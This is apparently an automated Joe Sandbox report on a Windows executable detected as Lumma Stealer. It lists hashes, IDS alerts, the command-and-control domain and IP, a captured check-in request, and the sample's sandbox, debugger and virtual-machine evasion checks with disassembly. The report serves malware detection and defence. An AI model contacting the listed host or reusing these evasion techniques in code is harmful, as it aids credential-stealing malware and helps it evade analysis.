Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561682
MD5:64f25a20bc6a8730e6d230e5d63dac8e
SHA1:f1c8a90fefc9e7789013cf9228827634ad8410f3
SHA256:daa2f6c445600573a591de7b8ad352699dcc9ff8b5bd2e1a6f93dc373572ceae
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 64F25A20BC6A8730E6D230E5D63DAC8E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T04:20:24.488324+010020283713Unknown Traffic192.168.2.749709104.21.33.116443TCP
2024-11-24T04:20:26.779861+010020283713Unknown Traffic192.168.2.749715104.21.33.116443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T04:20:25.409417+010020546531A Network Trojan was detected192.168.2.749709104.21.33.116443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-24T04:20:25.409417+010020498361A Network Trojan was detected192.168.2.749709104.21.33.116443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: file.exeReversingLabs: Detection: 42%
Source: file.exeVirustotal: Detection: 50%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl1_2_0058CF05
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh1_2_005BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh1_2_005BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h1_2_005BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh1_2_005BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax1_2_005BB860
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax1_2_0058C02B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]1_2_0058E0D8
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax1_2_005BF8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax1_2_005BF8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]1_2_005898F0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax1_2_005BB8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx1_2_005BB8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]1_2_0058E970
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx1_2_0058EA38
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]1_2_0058E35B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h1_2_005BBCE0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx1_2_0058BC9D
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp1_2_00585C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp1_2_00585C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_005A8CB0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]1_2_0058AD00
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]1_2_005A5E90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]1_2_005C0F60
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]1_2_005877D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax1_2_005877D0

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49709 -> 104.21.33.116:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49709 -> 104.21.33.116:443
Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.33.116:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 104.21.33.116:443
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1407874228.0000000001119000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1446968605.000000000111A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000001.00000002.1447078609.000000000116F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1404016851.0000000001185000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447104795.0000000001185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000001.00000002.1447078609.000000000116F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api6
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49709 version: TLS 1.2

System Summary

barindex
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005B90301_2_005B9030
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005889A01_2_005889A0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0058CF051_2_0058CF05
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005840401_2_00584040
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005868401_2_00586840
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005BC0401_2_005BC040
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065D8781_2_0065D878
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B1_2_0074A83B
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0058E0D81_2_0058E0D8
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005BF8D01_2_005BF8D0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005898F01_2_005898F0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005BB8E01_2_005BB8E0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0062A0951_2_0062A095
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0058E9701_2_0058E970
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0066793F1_2_0066793F
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007441051_2_00744105
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006CC9ED1_2_006CC9ED
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005B41D01_2_005B41D0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005861A01_2_005861A0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005892101_2_00589210
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0058B2101_2_0058B210
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00584AC01_2_00584AC0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007422C51_2_007422C5
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0059FB601_2_0059FB60
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0059DB301_2_0059DB30
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00582B801_2_00582B80
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005894D01_2_005894D0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00586CC01_2_00586CC0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005B24E01_2_005B24E0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00585C901_2_00585C90
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005C0C801_2_005C0C80
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005A8CB01_2_005A8CB0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005A3D701_2_005A3D70
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0058AD001_2_0058AD00
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005995301_2_00599530
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00752DE21_2_00752DE2
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005835801_2_00583580
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005C15801_2_005C1580
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074DD871_2_0074DD87
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005A06501_2_005A0650
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005A7E201_2_005A7E20
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005A5E901_2_005A5E90
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005A87701_2_005A8770
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005C0F601_2_005C0F60
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0073D7271_2_0073D727
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0063F70A1_2_0063F70A
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005877D01_2_005877D0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005827D01_2_005827D0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007457BC1_2_007457BC
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005A17901_2_005A1790
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005BC7801_2_005BC780
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005B87B01_2_005B87B0
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992955942622951
Source: file.exeStatic PE information: Section: olszqzdv ZLIB complexity 0.9941287265839172
Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005B27B0 CoCreateInstance,1_2_005B27B0
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 42%
Source: file.exeVirustotal: Detection: 50%
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: file.exeStatic file information: File size 1852416 > 1048576
Source: file.exeStatic PE information: Raw size of olszqzdv is bigger than: 0x100000 < 0x19a600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.580000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olszqzdv:EW;iwdrpyuy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;olszqzdv:EW;iwdrpyuy:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: file.exeStatic PE information: real checksum: 0x1cbb36 should be: 0x1d081d
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: olszqzdv
Source: file.exeStatic PE information: section name: iwdrpyuy
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007EE07D push 3BF92469h; mov dword ptr [esp], edx1_2_007EE09B
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00832886 push 4D5CF923h; mov dword ptr [esp], edi1_2_00832903
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00595057 push eax; iretd 1_2_00595058
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00817891 push 1C7AF24Fh; mov dword ptr [esp], eax1_2_00817997
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00817891 push 3B42EED2h; mov dword ptr [esp], edi1_2_008179BE
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00817891 push ebx; mov dword ptr [esp], edx1_2_008179F4
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00817891 push 46AEB2E6h; mov dword ptr [esp], eax1_2_00817A74
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065D878 push 2A5D5A00h; mov dword ptr [esp], edx1_2_0065D89F
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065D878 push 6F2BA921h; mov dword ptr [esp], edx1_2_0065D8E8
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065D878 push ecx; mov dword ptr [esp], 628D8CC0h1_2_0065D920
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065D878 push 6B9553FBh; mov dword ptr [esp], edx1_2_0065DA56
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065D878 push esi; mov dword ptr [esp], 76FF5BDDh1_2_0065DA5B
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0078505F push edi; mov dword ptr [esp], ebp1_2_0078516C
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0078505F push 3C8CB3D1h; mov dword ptr [esp], eax1_2_007851A5
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0078505F push 0E7CAE1Eh; mov dword ptr [esp], ebp1_2_007851AF
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F6035 push 551F4F78h; mov dword ptr [esp], edx1_2_007F6064
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push 5D3A2AB9h; mov dword ptr [esp], ecx1_2_0074A8BE
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push 6269E27Ah; mov dword ptr [esp], ecx1_2_0074A922
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push ebx; mov dword ptr [esp], edx1_2_0074AA0B
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push esi; mov dword ptr [esp], ebp1_2_0074AA27
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push eax; mov dword ptr [esp], 3B657B95h1_2_0074ABAA
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push eax; mov dword ptr [esp], 57E9053Bh1_2_0074AC6F
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push eax; mov dword ptr [esp], 57EFF231h1_2_0074ACB7
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push edi; mov dword ptr [esp], ebx1_2_0074AD67
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push 35F0471Bh; mov dword ptr [esp], ecx1_2_0074ADC1
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push ebp; mov dword ptr [esp], esi1_2_0074ADCE
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push esi; mov dword ptr [esp], 671D122Dh1_2_0074ADD3
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push 23177867h; mov dword ptr [esp], esi1_2_0074ADF1
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push ecx; mov dword ptr [esp], 2BD2E100h1_2_0074AE48
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push ebp; mov dword ptr [esp], edx1_2_0074AEC5
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0074A83B push esi; mov dword ptr [esp], edi1_2_0074AF0B
Source: file.exeStatic PE information: section name: entropy: 7.981115903907639
Source: file.exeStatic PE information: section name: olszqzdv entropy: 7.953205529312231

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC84F second address: 5DC863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66E8C719DCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC863 second address: 5DC867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7578F6 second address: 7578FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7578FB second address: 757911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8838CF0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757911 second address: 757920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F66E8C719D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75702E second address: 757038 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8838CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757171 second address: 757184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnp 00007F66E8C719D6h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757184 second address: 75718A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75718A second address: 757190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757190 second address: 7571E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF6h 0x00000007 jmp 00007F66E8838CF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jnp 00007F66E8838CE6h 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F66E8838CF9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7571E5 second address: 7571EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7571EB second address: 757207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E8838CECh 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007F66E8838CE6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757207 second address: 75720B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759864 second address: 7598A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ecx, 633D60DBh 0x00000010 push 00000000h 0x00000012 sub esi, 150B3910h 0x00000018 call 00007F66E8838CE9h 0x0000001d push esi 0x0000001e push edx 0x0000001f jmp 00007F66E8838CF1h 0x00000024 pop edx 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a js 00007F66E8838CE6h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759952 second address: 75996B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759A04 second address: 759A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759A0A second address: 759A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F66E8C719DAh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F66E8C719D8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov ecx, eax 0x00000029 push 00000000h 0x0000002b xor esi, 223642BAh 0x00000031 call 00007F66E8C719D9h 0x00000036 push edi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F66E8C719E5h 0x0000003e rdtsc
